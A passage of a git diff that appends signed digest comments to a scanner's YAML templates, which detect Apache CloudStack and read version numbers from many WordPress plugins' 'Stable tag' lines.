http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/technologies/apache/apache-cloudstack-detect.yaml b/http/technologies/apache/apache-cloudstack-detect.yaml index 2711a75a58..bff3d8bc77 100644 --- a/http/technologies/apache/apache-cloudstack-detect.yaml +++ b/http/technologies/apache/apache-cloudstack-detect.yaml @@ -26,3 +26,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220268e39fea1438b8ede541f545337c0c6f6027159cbd433c75bd0f9be63877ea6022100b842369be9a18c54da45a39a9f188c687b365eb23b3869afadd42c22b7dbea08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..9217fea241 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000b1e46493e43063d51c2adedbdc60f54cf093a7667c5fc01ee38ea82c8f9e28022100b3f3d955b2c1ff2e60446258eea31b80991f61fde04d34f314e495daa7299f3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..668bc84048 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220690a0f8a3f72d97ea9fc4fca292474308b5907e823f5878d70f590362ba7c3a9022060ed54e1fc4331b08804676916169e3e3e5cc96f992c834db926cdba45608865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..a44f2864b1 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207c05a512c903aaecc2c4df6769175f7af14cd5856a0a6bc280f8423be5d04fe702200a41e88fd5bbe2bbd4dad978502abf4da67d2247e4eaa0a28b9425e9f6369ff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..ffdae6908e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a7a9d880c3237ba183dec9475c44fcf221f17f08316030fec5e107957f0516d9022100e58f78775f0451b13ea863e0870d382baba32efc77567e21a0e56b24ed67dbac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..8ba8e3639e 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220107aa75b8f3f11fd71081c510be9a9e420e8eef397d99cefebf5f341d134bbdd02207ca682994f9da63f67d1a905267675e0e7166efcec9d2a7d5f4eba377de006b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..739b838e05 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e1e84d65aa74e3e0e2d47d555702218883cd86f71dc2655b475a7d1a2f03b000221009be3cb9e75aa59678f5cb5bf4da749d3e7fcbec8f227c6bb94b4a0167f393144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..6368040c9a 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206d6774e49fd08067b7e090fd0be6d18800ed9b9e8d122a6c40c6ff40a1fabf07022100c95ea174d2cb196ebf350b575921b1222e1ffe4a2e0d7fb6f82938620054223e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..25b575c5b1 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220554e34006563dd08d4bcfb4b6a177313b6dc9e00e93b94a3f2b705f3d9fdab9d022007ebf1febb018f7be01c9e7c5d56a7cae2cb6405c8d9c1bb7e5b44d83037b136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..e7aee6e832 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d263e57577806079fd4a261f119ffac6828bceed19c77a674088f40427c3bf3022100e893ea2eb3186d869765d6b76d7fdad61903375b849e4b75a7175af1be1c1c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..e07510a2c2 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f565ce787f4d311b9c5320a6321159348b77c0d102a60ec300839840ed433c0022100c824e6676f256917fbd100afd2490982ab89a348da052b7361b0d5fe9cfd9b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..7cadd9619e 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203558201bb4dd5a68db7b2e7d602573f62c87a6bb7b0dc3eab0b3c218a3a0d7d9022024209e4f6c9cd8e71f948f3289d3c10a426e527d636d626679c5990c99bcf44e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..3e6e74325b 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220426dfa2854b9c515c2d04fb05531249a635290b37bb3f2b0b9d0b41d6cb942210220538bd278c316356434e1687def9ce0518529b2983ebb6eaf7288c5c882ed1429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..036128a197 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008405bf7bae9c61712b07587a009c640019a17084ad48f93b555cd07ca85592e502205d95f8d7ce3e008715d184dfb97c13c91d765124439b1a50f81140aca0cb5b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..689bf1faeb 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b2c2ce1341c322cb29182feed85d5d1f7b0e55687a730b28ce427ab1554fe9b022100f97ef973f20e7045fb61e477c12dee7761edc8413bdda39e895633a5f4d221b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..bf31e9872b 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022042587514e139ec00607edd73ac20ecac6f755a9939690fe95a123c2e489ae0a4022100e256542c51ae86808cce5e906cbcf75261890aac2b43a496a6677fd91f7d5384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..4f477a6b13 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd13f57f68e2e7d39e6e81d799badf14c7d5cb1e2dd43ff6f8648ddeca59e69e022100a5e4bfafcc7e25e461114386ac9a56b523f445b4549dd7bcbc4587ccd2773d67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..c9351b108f 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a817969965da711e8b60cf0433f9b44e7ab0c64d7aac347d35cb862ab0e1c19402207b79e6ab056a3ebfa84d515fb82bf241b28fe73e10c9f5e64881e1291a52435e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..7baa8305af 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ad3f68b686fa910c306265456f00fe58341e0cf1f52a1ffa3d790299703febc50221008cb55552d595d907151402ff48ed136a022f0bd38aefc70feaf633630ca40464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..757bbc1f4f 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200cb1b0d3800d9d608217ff825e81f39b085e6bd9139139fcbf073f2d891554b3022100e8cb0eb2814a8ec69321b6ec656863888fecc6a702d12c885017d1ee7106ca6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..c748b9c51a 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220636fbbe948fe30c6a91dd4a9093ed221d7f8a186607c18482e1987c68b1add5c022100ac1a6dec93b32f63676329103d300a92c27f35dd985f322fabe6283759d06c02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..4db6a405cd 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bfa100e0acf43683080bf1fb05c19fb0c57c6856a9ed109e2f349ef838447711022100ad14df13f9cc5e97727a389c370ba43d2770d92c29938172a621822c751960da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..f0bf70c5a7 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0795fd49ffe260f662d7833ed60f4a3ee97e0a1c091f942f6bd5dfdb7657ad902201d1c56fc4d73fe5f96f610fd47d1e78a7d32069f271639803d619ed178ae6317:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..04da5075a4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb387ef1353ed22ba9e955ba66a381578d012221e169eb1588fee2cd58d690b80220342f8c32942be13da7a3709a6e1cdefe0ac40e6ba7e75bd9bacc2c0987af128e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..5322b4a34e 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec41318d996698c266376336f9d748acf2df7eff4cae613ab4694d288bdd8cbf0220602563c441d91c5bc64a145703f1032bb5bbf20d6d19a66cf0d80697ba1a7856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..58929a537f 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100977157248671bf40e47561d444e9bcf17b42e465411279a09aa5f509bdd22bf102201066c65e4418cc5899aca74c398837269f2b478a3669157f5850e977683b3eeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..8cedbd5267 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022055f377e3abf2670e5abb980dbdbdfaef27b99555805f0a6aaab55c83c95c9eb80221008adfb9a5199fe885e6db26a3f40af2a0c8b360307f093cd4a5b6a330c9a3b984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..76bedbb3c3 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210091d8ccae937979f81beed96269ecba5466b8a2aad0a14095ea465b32821d2e980220070b5a7b1293791e4f8f100306a5236612c2ba4f28e1f3c66144cd73ad80f4f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..adaf4ecae2 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220513e68a5124b3f29e8844052f6311f5293c3bd376c3ce45f026d672e83f00fc702204e750c48b5928af2f103650940debef4d7d0af509b802d567df7b475034bf1d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..d463433664 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bb0445efbde7f26077f3b48ff5e53cf1d1a3b55a61af5824389cf0412b6b03a602207aa75967b92c6c2559d86a862cad4a85083570652fc6bb21e45af5523b43a066:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..b5fa266362 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205e013ec59adfff32d71a88c5c7b6c5ce0af148a18227bd4f7a74a98d63ccbbe202201588aa83352424087d24f8cc3773da6e292725d52b7317d12250a1fffeb1c051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..b92eeef6f5 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201bc38c0f5d88cadda71d295d2bc50a714aac105cb72f9931d482033fed6584fa02200b91ff8c8d2e9f6fccd45b77405d531ae67d3e800c7e789c1f9d8fd848c1ee71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..10a6e087d5 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7f36201c832c8bdd692f3b29dbb007ed952f15495b1029d4110be06821822f1022017ce7812981acd717163815e10c620ec91603a04a2ae98848e612e8c721760c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..20ec6aef1c 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017bf92efe29161cdaf705bca0b889a9d608f0037a0eff16122157a0e3220afb7022100958d80c4d55f5e2e92daa9e5bd835065a755c33b82a59a6d0b2a96f47aaa5732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..653ebda20f 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b1bb75e9850fc1394117d85bb5ab55fe3f9d2de0e27ba145f2b1a3f89766976a022100e09560d3f214c6b2572b3550ddac5fafd32497129c9a912f952e112cbfdd87d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..671f9f16f4 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022018cab9081e043729db09e9b37153ef2b51ee290d88cdee5c7de8150eeca03b15022100b4e6b6d7f111df0b23c2407d2e0ee92e78d8ac0ce8e23c06098380d8ebd84621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..c17c8adbb2 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206415a097e4a12ab73e541b0ffe564c23bcc1515c342ea8bf97ea599d62bdaae1022100f7b8d2aacc052671eb704fe2dbf7c2b81c82a83ebf98c9a05bf3b41e87acf9ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..62a7acb542 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e019012493fd241bbdc14b5145781f2a28fee5644f7aec272622be85bf3e8be022100d96098de74700afb184f448ef0f4021ff3baa59c95cc05912ca1ec3ac0f86e31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..69a332d0ac 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201af4c24576758970bb619ba72a3787e9c6b81754dbfa573fd10ab618696b48920220573832c0caf8919135d9a67c3af4e46284400a47c53f899ba0224ae501f7040e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..8077798f5f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220727e034a12924e3d688d89df534b5bd7720f38e9425b0d6f34edba5ffd60bc9a022100ff13fcc0e45d94834d548c34cf210e3503acbf0e5aa6b19a4986baa81b22d87f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..51c04665c2 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220449cc13e3691f0806c03720d96eafca4abf0fb4600b971213c89fc42901b5a5f022100c1b16a6fdb0864d7892198d3ece4ad0a25caf260e35ed92cef5cc3e3d38c9a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..25ade1be03 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009723fb9d5cc518917d1d63ff78db96d1270d8b76b3e82859d45cef1d7e0292e3022063d79437855b41c5514e666953a8427e46dc7a9fd4b59808ed1f8a71353e35df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..cb920711bb 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0f01653fae6e65eacb0b63f008f34c1f4efd7955cb86159b74ef6cdeba45e9a022100e052e87393749daa920baaf3335422fb335ebfc43362f597c6ad340443a0b88d:922c64590222798bb761d5b6d8e72950 \ 